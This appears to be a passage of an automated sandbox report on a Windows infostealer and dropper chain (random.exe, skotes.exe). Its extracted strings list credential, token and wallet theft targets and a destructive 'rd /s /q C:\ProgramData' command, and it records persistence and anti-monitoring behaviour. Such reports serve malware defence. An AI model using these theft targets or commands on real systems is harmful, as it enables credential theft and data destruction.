Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll

Source: C:\Users\user\Desktop\random.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: random.exe

Static file information: File size 2144768 > 1048576

Source: random.exe

Static PE information: Raw size of sziqdakf is bigger than: 0x100000 < 0x19fa00

Source:	Binary string: A{"id":1,"method":"Storage.getCookies"}\|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2comctl32gdi32:225121Windows 11HTTP/1.1HARDWARE\DESCRIPTION\System\CentralProcessor\0abcdefgh
Source:	Binary string: System.Windows.Forms.pdb source: WER21C.tmp.dmp.14.dr, WER652B.tmp.dmp.36.dr
Source:	Binary string: Bedroom.pdbH^ source: L65uNi1.exe, 0000000A.00000000.2488525794.0000000000BB2000.00000002.00000001.01000000.0000000A.sdmp, L65uNi1.exe, 0000000A.00000002.2528551112.0000000004109000.00000004.00000800.00020000.00000000.sdmp, uniq.exe0.7.dr, L65uNi1[1].exe.7.dr
Source:	Binary string: System.Windows.Forms.pdbh source: WER21C.tmp.dmp.14.dr
Source:	Binary string: vdr1.pdb source: 1VB7gm8.exe, 00000008.00000003.2459365093.00000000047A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER21C.tmp.dmp.14.dr, WER652B.tmp.dmp.36.dr
Source:	Binary string: System.ni.pdbRSDS source: WER21C.tmp.dmp.14.dr, WER652B.tmp.dmp.36.dr
Source:	Binary string: mscorlib.ni.pdb source: WER21C.tmp.dmp.14.dr, WER652B.tmp.dmp.36.dr
Source:	Binary string: System.pdb) source: WER21C.tmp.dmp.14.dr
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdbu\ source: 1VB7gm8.exe, 00000008.00000003.2459365093.00000000047A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER21C.tmp.dmp.14.dr, WER652B.tmp.dmp.36.dr
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdb source: 1VB7gm8.exe, 00000008.00000003.2459365093.00000000047A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Bedroom.pdb source: L65uNi1.exe, 0000000A.00000000.2488525794.0000000000BB2000.00000002.00000001.01000000.0000000A.sdmp, L65uNi1.exe, 0000000A.00000002.2528551112.0000000004109000.00000004.00000800.00020000.00000000.sdmp, uniq.exe0.7.dr, L65uNi1[1].exe.7.dr, WER21C.tmp.dmp.14.dr, WER652B.tmp.dmp.36.dr
Source:	Binary string: Bedroom.pdbMZ@ source: WER652B.tmp.dmp.36.dr
Source:	Binary string: System.ni.pdb source: WER21C.tmp.dmp.14.dr, WER652B.tmp.dmp.36.dr
Source:	Binary string: System.pdb source: WER21C.tmp.dmp.14.dr, WER652B.tmp.dmp.36.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\random.exe	Unpacked PE file: 0.2.random.exe.6d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sziqdakf:EW;vzkrrfrv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sziqdakf:EW;vzkrrfrv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.e30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sziqdakf:EW;vzkrrfrv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sziqdakf:EW;vzkrrfrv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 3.2.skotes.exe.e30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sziqdakf:EW;vzkrrfrv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sziqdakf:EW;vzkrrfrv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 7.2.skotes.exe.e30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sziqdakf:EW;vzkrrfrv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sziqdakf:EW;vzkrrfrv:EW;.taggant:EW;

.NET source code contains method to dynamically call methods (often used by packers)

Source: uniq.exe.7.dr, s1l70P8mWLYDmBOs6L.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: L65uNi1.exe.7.dr, s1l70P8mWLYDmBOs6L.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: af53YGc[1].exe.7.dr, s1l70P8mWLYDmBOs6L.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: af53YGc.exe.7.dr, s1l70P8mWLYDmBOs6L.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: uniq.exe.7.dr

Static PE information: 0xDF9E7476 [Fri Nov 19 11:54:30 2088 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: 1VB7gm8.exe0.7.dr	Static PE information: real checksum: 0x1b99da should be: 0x1b6df8
Source: 1VB7gm8[1].exe.7.dr	Static PE information: real checksum: 0x1b99da should be: 0x1b6df8
Source: MvowLGc.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x25ab6
Source: L65uNi1.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0xc79f6
Source: af53YGc.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0xc79f6
Source: L65uNi1[1].exe.7.dr	Static PE information: real checksum: 0x0 should be: 0xc79f6
Source: 7fOMOTQ.exe.7.dr	Static PE information: real checksum: 0x1d70da should be: 0x1d0a12
Source: random.exe	Static PE information: real checksum: 0x21177f should be: 0x213f8e
Source: uniq.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0xd7212
Source: af53YGc[1].exe.7.dr	Static PE information: real checksum: 0x0 should be: 0xc79f6
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x21177f should be: 0x213f8e
Source: 7fOMOTQ[1].exe.7.dr	Static PE information: real checksum: 0x1d70da should be: 0x1d0a12
Source: 1VB7gm8.exe.7.dr	Static PE information: real checksum: 0x1b99da should be: 0x1b6df8

Source: random.exe	Static PE information: section name:
Source: random.exe	Static PE information: section name: .idata
Source: random.exe	Static PE information: section name:
Source: random.exe	Static PE information: section name: sziqdakf
Source: random.exe	Static PE information: section name: vzkrrfrv
Source: random.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: sziqdakf
Source: skotes.exe.0.dr	Static PE information: section name: vzkrrfrv
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: 7fOMOTQ[1].exe.7.dr	Static PE information: section name:
Source: 7fOMOTQ[1].exe.7.dr	Static PE information: section name: .idata
Source: 7fOMOTQ[1].exe.7.dr	Static PE information: section name:
Source: 7fOMOTQ[1].exe.7.dr	Static PE information: section name: bhaywimc
Source: 7fOMOTQ[1].exe.7.dr	Static PE information: section name: nbbvkuhp
Source: 7fOMOTQ[1].exe.7.dr	Static PE information: section name: .taggant
Source: 7fOMOTQ.exe.7.dr	Static PE information: section name:
Source: 7fOMOTQ.exe.7.dr	Static PE information: section name: .idata
Source: 7fOMOTQ.exe.7.dr	Static PE information: section name:
Source: 7fOMOTQ.exe.7.dr	Static PE information: section name: bhaywimc
Source: 7fOMOTQ.exe.7.dr	Static PE information: section name: nbbvkuhp
Source: 7fOMOTQ.exe.7.dr	Static PE information: section name: .taggant
Source: 1VB7gm8.exe.7.dr	Static PE information: section name:
Source: 1VB7gm8.exe.7.dr	Static PE information: section name: .idata
Source: 1VB7gm8.exe.7.dr	Static PE information: section name:
Source: 1VB7gm8.exe.7.dr	Static PE information: section name: gfrqabhk
Source: 1VB7gm8.exe.7.dr	Static PE information: section name: clsldkbz
Source: 1VB7gm8.exe.7.dr	Static PE information: section name: .taggant
Source: 1VB7gm8[1].exe.7.dr	Static PE information: section name:
Source: 1VB7gm8[1].exe.7.dr	Static PE information: section name: .idata
Source: 1VB7gm8[1].exe.7.dr	Static PE information: section name:
Source: 1VB7gm8[1].exe.7.dr	Static PE information: section name: gfrqabhk
Source: 1VB7gm8[1].exe.7.dr	Static PE information: section name: clsldkbz
Source: 1VB7gm8[1].exe.7.dr	Static PE information: section name: .taggant
Source: 1VB7gm8.exe0.7.dr	Static PE information: section name:
Source: 1VB7gm8.exe0.7.dr	Static PE information: section name: .idata
Source: 1VB7gm8.exe0.7.dr	Static PE information: section name:
Source: 1VB7gm8.exe0.7.dr	Static PE information: section name: gfrqabhk
Source: 1VB7gm8.exe0.7.dr	Static PE information: section name: clsldkbz
Source: 1VB7gm8.exe0.7.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00E4D91C push ecx; ret	7_2_00E4D92F
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0044C050 push edx; ret	11_2_0044C051
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00420B4B push es; retf	11_2_00420B4D
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00444BF0 push eax; mov dword ptr [esp], A1A0A796h	11_2_00444BF2
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Code function: 16_2_012D4ABF push ds; retf	16_2_012D4AC0
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Code function: 16_2_012CBA14 push 2A012BCBh; retf	16_2_012CBA1D
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Code function: 16_2_012D6E17 push cs; iretd	16_2_012D6E18
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Code function: 16_2_012CCAC8 pushfd ; iretd	16_2_012CCACD
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Code function: 16_2_012D4EDF push ds; retf	16_2_012D4EE0
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Code function: 16_2_0132EF07 push esp; retf	16_2_0132EF08
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Code function: 16_2_0132FF0F push esp; retf	16_2_0132FF10
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Code function: 16_2_0132E640 push edi; retf	16_2_0132E641
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Code function: 16_2_013283B8 push eax; iretd	16_2_013283B9
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Code function: 16_2_0132DEFF push esp; retf	16_2_0132DF00
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Code function: 16_2_0132F6E1 pushfd ; ret	16_2_0132F6E2
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0044E89B push eax; iretd	23_2_0044E8B1
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0044D134 push cs; retf	23_2_0044D135
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0044E316 push es; iretd	23_2_0044E317
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0044946C push ebp; retf	23_2_0044942B
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00449416 push ebp; retf	23_2_0044942B
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00444E10 push eax; mov dword ptr [esp], 85848BBAh	23_2_00444E14
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0044B711 push edx; iretd	23_2_0044B712

Source: random.exe	Static PE information: section name: entropy: 7.043402202406586
Source: random.exe	Static PE information: section name: sziqdakf entropy: 7.954205439228711
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.043402202406586
Source: skotes.exe.0.dr	Static PE information: section name: sziqdakf entropy: 7.954205439228711
Source: 7fOMOTQ[1].exe.7.dr	Static PE information: section name: entropy: 7.980909183702386
Source: 7fOMOTQ[1].exe.7.dr	Static PE information: section name: bhaywimc entropy: 7.954105147120386
Source: 7fOMOTQ.exe.7.dr	Static PE information: section name: entropy: 7.980909183702386
Source: 7fOMOTQ.exe.7.dr	Static PE information: section name: bhaywimc entropy: 7.954105147120386
Source: 1VB7gm8.exe.7.dr	Static PE information: section name: entropy: 7.98240674670441
Source: 1VB7gm8.exe.7.dr	Static PE information: section name: gfrqabhk entropy: 7.953368544557863
Source: 1VB7gm8[1].exe.7.dr	Static PE information: section name: entropy: 7.98240674670441
Source: 1VB7gm8[1].exe.7.dr	Static PE information: section name: gfrqabhk entropy: 7.953368544557863
Source: 1VB7gm8.exe0.7.dr	Static PE information: section name: entropy: 7.98240674670441
Source: 1VB7gm8.exe0.7.dr	Static PE information: section name: gfrqabhk entropy: 7.953368544557863
Source: MvowLGc.exe.7.dr	Static PE information: section name: .text entropy: 7.408927699131642

Source: uniq.exe.7.dr, s1l70P8mWLYDmBOs6L.cs	High entropy of concatenated method names: 'VAYPi0gMpB', 'nW4lBacjpc', 'yJ9PnvReTK', 'GevPEs5ZlO', 'gkNPK4v4fw', 'o7SPNXHjF0', 'KmAZJZ5bsD', 'Fupap7L4k', 'r4yl3DrYU', 'rewL2KpDf'
Source: uniq.exe.7.dr, cVtkWMF9BXSUpNpZaGX.cs	High entropy of concatenated method names: 'cMXGkimXqS', 'yhcGJJVgWb', 'RTMG9LTTMo', 'nmhGrPX3O8', 'wLgGAj6lSy', 'KeNG22TvML', 'xfBGmYjwkH', 'e3bFNlGvVM', 'd2AGYe9bE9', 'HbuGuZGGpK'
Source: L65uNi1.exe.7.dr, s1l70P8mWLYDmBOs6L.cs	High entropy of concatenated method names: 'VAYPi0gMpB', 'nW4lBacjpc', 'yJ9PnvReTK', 'GevPEs5ZlO', 'gkNPK4v4fw', 'o7SPNXHjF0', 'KmAZJZ5bsD', 'Fupap7L4k', 'r4yl3DrYU', 'rewL2KpDf'
Source: L65uNi1.exe.7.dr, cVtkWMF9BXSUpNpZaGX.cs	High entropy of concatenated method names: 'cMXGkimXqS', 'yhcGJJVgWb', 'RTMG9LTTMo', 'nmhGrPX3O8', 'wLgGAj6lSy', 'KeNG22TvML', 'xfBGmYjwkH', 'e3bFNlGvVM', 'd2AGYe9bE9', 'HbuGuZGGpK'
Source: af53YGc[1].exe.7.dr, s1l70P8mWLYDmBOs6L.cs	High entropy of concatenated method names: 'VAYPi0gMpB', 'nW4lBacjpc', 'yJ9PnvReTK', 'GevPEs5ZlO', 'gkNPK4v4fw', 'o7SPNXHjF0', 'KmAZJZ5bsD', 'Fupap7L4k', 'r4yl3DrYU', 'rewL2KpDf'
Source: af53YGc[1].exe.7.dr, cVtkWMF9BXSUpNpZaGX.cs	High entropy of concatenated method names: 'cMXGkimXqS', 'yhcGJJVgWb', 'RTMG9LTTMo', 'nmhGrPX3O8', 'wLgGAj6lSy', 'KeNG22TvML', 'xfBGmYjwkH', 'e3bFNlGvVM', 'd2AGYe9bE9', 'HbuGuZGGpK'
Source: af53YGc.exe.7.dr, s1l70P8mWLYDmBOs6L.cs	High entropy of concatenated method names: 'VAYPi0gMpB', 'nW4lBacjpc', 'yJ9PnvReTK', 'GevPEs5ZlO', 'gkNPK4v4fw', 'o7SPNXHjF0', 'KmAZJZ5bsD', 'Fupap7L4k', 'r4yl3DrYU', 'rewL2KpDf'
Source: af53YGc.exe.7.dr, cVtkWMF9BXSUpNpZaGX.cs	High entropy of concatenated method names: 'cMXGkimXqS', 'yhcGJJVgWb', 'RTMG9LTTMo', 'nmhGrPX3O8', 'wLgGAj6lSy', 'KeNG22TvML', 'xfBGmYjwkH', 'e3bFNlGvVM', 'd2AGYe9bE9', 'HbuGuZGGpK'

Source: C:\Users\user\Desktop\random.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1070037001\uniq.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1070053001\0fc5fe7282.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1070041001\1VB7gm8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\7fOMOTQ[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\MvowLGc[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1070054001\48967fad90.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\1VB7gm8[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\5FheP4L[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\uniq[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1070042001\MvowLGc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1070047001\5FheP4L.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\L65uNi1[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1070052001\26dddb3c83.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\af53YGc[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1070040001\7fOMOTQ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1070046001\5FheP4L.exe	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b3d465ea47.exe			Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\random.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
